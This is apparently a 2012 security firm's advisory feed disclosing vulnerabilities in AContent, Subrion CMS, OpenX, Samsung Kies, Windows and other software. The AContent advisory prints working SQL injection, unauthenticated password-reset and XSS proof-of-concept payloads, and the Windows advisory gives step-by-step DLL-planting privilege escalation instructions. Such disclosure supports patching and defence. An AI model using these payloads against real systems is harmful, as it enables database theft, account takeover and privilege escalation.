HTB23117: AContent multiple vulnerabilities

Multiple security vulnerabilities discovered by High-Tech Bridge Security Research Lab in AContent version 1.2.

Advisory ID: HTB23117
Product: AContent
Vendor: ATutor
Vulnerable Version(s): 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: September 26, 2012 
Public Disclosure: October 17, 2012 
Vulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) SQL Injection in AContent: CVE-2012-5167

1.1 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.3 Input passed via the "id" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">
<input type="hidden" name="submit" value="1" />
<input type="submit" id="btn">
</form>

Successful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.

2) Improper Authentication in AContent: CVE-2012-5168

2.1 The vulnerability exists due to absent authentication in the "/user/index_inline_editor_submit.php" script. A remote unauthorized attacker can change users' passwords.

The following example will change password for user with id=1 to 'password'.

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password-1" />
<input type="hidden" name="value" value="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" />
<input type="submit" id="btn">
</form>

2.2 The vulnerability exists due to absent authentication in the "/course_category/index_inline_editor_submit.php" script. A remote unauthorized attacker can modify names for existing categories.

The following example will change category name with id=1 to 'new_category':

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1" />
<input type="hidden" name="value" value="new_category" />
<input type="submit" id="btn">
</form>

3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169

Input passed via the HTTP GET parameters "pathext", "popup", "framed", and "file" to /file_manager/preview_top.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.

The following PoCs (Proof of Concept) demonstrate the vulnerabilities:

http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Eale
rt%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert
%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealer
t%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%
28document.cookie%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

Users should apply patches #1 and #2 using the AContent Administrator's Updater tool

More Information:
http://update.atutor.ca/acontent/patch/1_2/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.
[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23113: Subrion CMS multiple vulnerabilities

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS version 2.2.1 which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and Сross-Site Request Forgery (CSRF) attacks.

• SQL Injection in Subrion CMS:
  Input passed via the "plan_id" POST parameter to "/register/" URL (modified by mod_rewrite to "system.php" script) is not properly sanitised before being used in SQL query.

• Cross-Site Scripting (XSS) in Subrion CMS:
  Input passed via the "f[accounts][fullname]" and "f[accounts][username]" GET parameters to "/advsearch/" URL (modified by mod_rewrite to "system.php" script), via the "id" and "group" GET parameters to multiple files is not properly sanitised before being returned to the user.

• Сross-Site Request Forgery (CSRF) in Subrion CMS:
  It is possible to create administrative account within application.

Proof of concept (Poc) examples available on original advisory page: HTB23113 - Multiple vulnerabilities in Subrion CMS.

HTB23107: jCore multiple vulnerabilities

jCore, a free and open source content management system (CMS), version 1.0pre, suffers from SQL Injection, XSS vulnerabilities.

Vulnerabilities was discovered by High-Tech Bridge Security Research Lab, and published on advisory page:

High-Tech Bridge Advisory HTB23107 - Multiple vulnerabilities in jCore.

SQL injection: input passed via the "memberloginid" COOKIE parameter to "admin/index.php" is not properly sanitised before being used in SQL query.

XSS: input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.

Solution: upgrade to the last release.

HTB23099: Samsung Kies multiple vulnerabilities

Multiple vulnerabilities in Samsung Kies version 2.3.2.12054_20 and probably prior have been discovered by High-Tech Bridge Security Research Lab, that allows remote attacker to compromise affected system, execute and modify arbitrary files, modify arbitrary directories and modify System Registry with privileges of the current user. Vulnerabilities types in HTB23099: NULL pointer dereference, improper access control vulnerabilities

• Null Pointer Dereference in Samsung Kies:
  The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control.

• Arbitrary File Execution in Samsung Kies:
  The CmdAgent.dll library has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

• Arbitrary Directory Modification in Samsung Kies:
  The CmdAgent.dll library, has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

• Arbitrary Registry Modification in Samsung Kies:
  The CmdAgent.dll library, has numerous Registry modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be leveraged by an untrusted source.

PoC-examples, additional details and how-to-fix information available on researcher's page.

Video: The Growing Hacking Threat to Websites: An Ongoing Commitment to Web Application Security

Watch "The Growing Hacking Threat to Websites: An Ongoing Commitment to Web Application Security" video on Youtube:

Links:

• htbridge.com/websecurity
• Video on YouTube
• Publication on our blog

CVE-2012-1535: Adobe Flash Player integer overflow vulnerability analysis

Brian Mariani and Frederic Bourla from High-Tech Bridge has published whitepaper "CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis". Publication explains the particulars of the CVE-2012-1535 security vulnerability in details.

You can download PDF here: CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis.

HTB23116: OpenX cross-site scripting & SQL injection vulnerabilities

Multiple vulnerabilities in OpenX have been discovered by High-Tech Bridge Security Research Lab 3 week ago and disclosed this week.

• Cross-Site Scripting (XSS) in OpenX: Input passed via the "parent" GET parameter to "www/admin/plugin-index.php" is not properly sanitised before being returned to the user.

• SQL Injection in OpenX: Input passed via the "ids[]" POST parameter to "www/admin/campaign-zone-link.php" is not properly sanitised before being used in SQL query.

To fix this issues replace files from SVN repository as mentioned in High-Tech Bridge security advisory HTB23116: Multiple vulnerabilities in OpenX. PoC examples also available on researcher's page.

How to Secure Your Digital Assets in the Era of Cyber War (October, 16)

High-Tech Bridge Annual Conference

Date:	16 October 2012
Venue:	Crowne Plaza Hotel, Geneva, Switzerland

Businesses of all sizes are embracing new approaches to IT (such as cloud computing, virtualisation, BYOD and BPO), making them more and more dependent upon their IT infrastructure. This dynamic IT environment stimulates hackers, and organisations face increasingly targeted and sophisticated attacks. The attackers range from individual "hacktivists" to organised crime rings and totalitarian nation-states. Many hackers are highly organised and skilled.

Despite the prevalence of firewalls, IDS/IPS, encryption and other security measures, many organisations continue to fall victim to hacking attacks due to configuration errors or inadequate security solutions. As a result, companies are beginning to recognise the importance of regular security audits, because human experience and analysis are essential to the maintenance of a strong network security perimeter.

To raise awareness of the threat facing all types of organisations, High-Tech Bridge organises its annual conference entitled "How to Secure Your Digital Assets in the Era of Cyber War". The conference will take place on Tuesday, 16 October 2012, at Crowne Plaza Hotel, Geneva.

Frost & Sullivan Principal Alexander Michael will be speaking at the conference with the following presentation: "Ethical Hacking: Why it is a Business Investment, not a Cost".

For additional information about the event, please follow the link: https://www.htbridge.com/events/high_tech_bridge_annual_conference_2012.html

If you would like to obtain Mr Michael's presentation or receive Frost & Sullivan's two recent security whitepapers, please contact Joanna Lewandowska, Corporate Communications, at joanna.lewandowska (at) frost.com.

Source: How to Secure Your Digital Assets in the Era of Cyber War (frost.com)

HTB23108: Privilege escalation vulnerability in Microsoft Windows

This Tuesday, October 9, High-Tech Bridge has disclosed details of security advisory HTB23108: Privilege escalation vulnerability in Microsoft Windows.

Vendor:	Microsoft Corporation
Vulnerable Versions:	Windows Vista, Windows Server 2008, Windows 7, Windows 8 RP
Tested Version:	Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 Professional SP1, Windows 8 RP
Vulnerability Type:	Uncontrolled Search Path Element [CWE-427]
CVE Reference:	Pending
CVSSv2 Base Score:	6 (AV:L/AC:H/Au:S/C:C/I:C/A:C)
Risk Level:	Medium

Description

High-Tech Bridge Security Research Lab has discovered a vulnerability in Microsoft Windows which could be exploited to escalate privileges under certain conditions.

The vulnerability exists due to the "IKE and AuthIP IPsec Keying Modules" system service, which tries to load the "wlbsctrl.dll" DLL that is missing after default Windows installation.

The "IKE and AuthIP IPsec Keying Modules" service starts automatically in default configuration (after default installation) of:

• Microsoft Windows Vista
• Microsoft Windows 2008
• Microsoft Windows 7
• Microsoft Windows 8 Release Preview

Moreover the service runs with SYSTEM privileges by default. Therefore an unprivileged local user who has write access to a default or any other search PATH locations can execute arbitrary code on the vulnerable system with the privileges of the SYSTEM account.

Vulnerability Details

The "IKE and AuthIP IPsec Keying Modules" service tries to loads the "wlbsctrl.dll" library which is missing. This forces Microsoft Windows to use search PATH procedure to locate the missing dynamic-link file in the following order described by Microsoft.

• The directory from which the application loaded
• The system directory
• The 16-bit system directory
• The Windows directory
• The current directory
• The directories that are listed in the PATH environment variable

When directory is created in the C:\ root folder, access permissions for files and subfolders are inherited from the parent directory. By default members of the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA privileges to all directories created within the C:\ root folder. This also applies to folders created by application's installer. The vulnerability is introduced to the system when software does not change default permissions to installation directory and adds its installation path to the PATH system environment variable. Any member of the Authenticated users group can place malicious file named "wlbsctrl.dll" into that folder and execute arbitrary code on the system after simple reboot.

A brief research confirmed that the following well-known software makes the weakness exploitable when installed into the C:\ root folder:

- ActivePerl 5.16.1.1601 (default installation): CVE-2012-5377
Adds to the PATH variable: C:\Perl\Site\bin;

- ActiveTcl 8.5.12 (default installation): CVE-2012-5378
Adds to the PATH variable: C:\TD\bin

- ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5379
Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts;

- Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5380
Adds to the PATH variable: C:\Ruby193\bin;

- PHP 5.3.17 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\PHP): CVE-2012-5381
Adds to the PATH variable: C:\PHP\;

- Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C root folder, e.g. C:\Zend): CVE-2012-5382
Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin

- MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\MySQL): CVE-2012-5383
Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin

Attack vectors

Any member of the Authenticated Users group can escalate his privileges to SYSTEM when the following conditions are met:

1. The above-mentioned software sets insecure privileges for installation folder (that is writable by members of the Authenticated Users group).
2. The above-mentioned software adds its installation path to the system PATH environment variable.

Proof of Concept

You can download the PoC (Proof of Concept) that demonstrates vulnerability exploitation under non-privileged user account on default installation of Windows 7 with default installation of the latest version of ActivePerl.

How to exploit:

1. Log in under an unprivileged system account.
2. Download and extract the HTB23108-P0c-Windows-Services.rar archive.
3. Copy the files from the archive into the C:\Perl\site\bin folder.
4. Reboot the system.
5. Log in under unprivileged system account.
6. Run the C:\Perl\site\bin\ADMC.exe file.

7. Enter the following credentials when asked:
   Login: fox
   Password: 1234

8. Type "shell" and then "whoami" command in the system console and you will see: "nt authority\system" – you have administrative console.

Conclusion

Many Windows services have missing DLLs, and search PATH procedure is a built-in Windows feature. However, in this case the service with the missing DLL runs by default with SYSTEM privileges. Combined with some well-known software in default installation this "feature" becomes a perfectly exploitable vulnerability under relatively spread Windows configuration.

Solution:

Official MSRC answer:
Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

Microsoft requested and validated to disclose the advisory on the 9th of October 2012.

APlease refer to our Disclosure Policy if you have any questions.

References:

[1] High-Tech Bridge Advisory HTB23108 - https://www.htbridge.com/advisory/HTB23108 - Privilege Escalation Vulnerability in Microsoft Windows
[2] Microsoft Windows - http://www.microsoft.com - Microsoft Windows is a series of graphical interface operating systems developed, marketed, and sold by Microsoft.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23115: Template CMS multiple vulnerabilities

Template CMS version 2.1.1 suffers from XSS and CSRF vulnerabilities.

Template CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

• CWE-79: cross-site scripting in Template CMS:
  Input passed via the "themes_editor" POST parameter to "admin/index.php" is not properly sanitised before being returned to the user (CVE-2012-4901).
  CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)

• CWE-352: cross-site request forgery
  Template CMS v.2.1.1 allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests (CVE-2012-4902).
  CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Related links:

• High-Tech Bridge Advisory HTB23115 - Multiple vulnerabilities in Template CMS
• Template CMS
• CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
• CWE-352: Cross-Site Request Forgery (CSRF)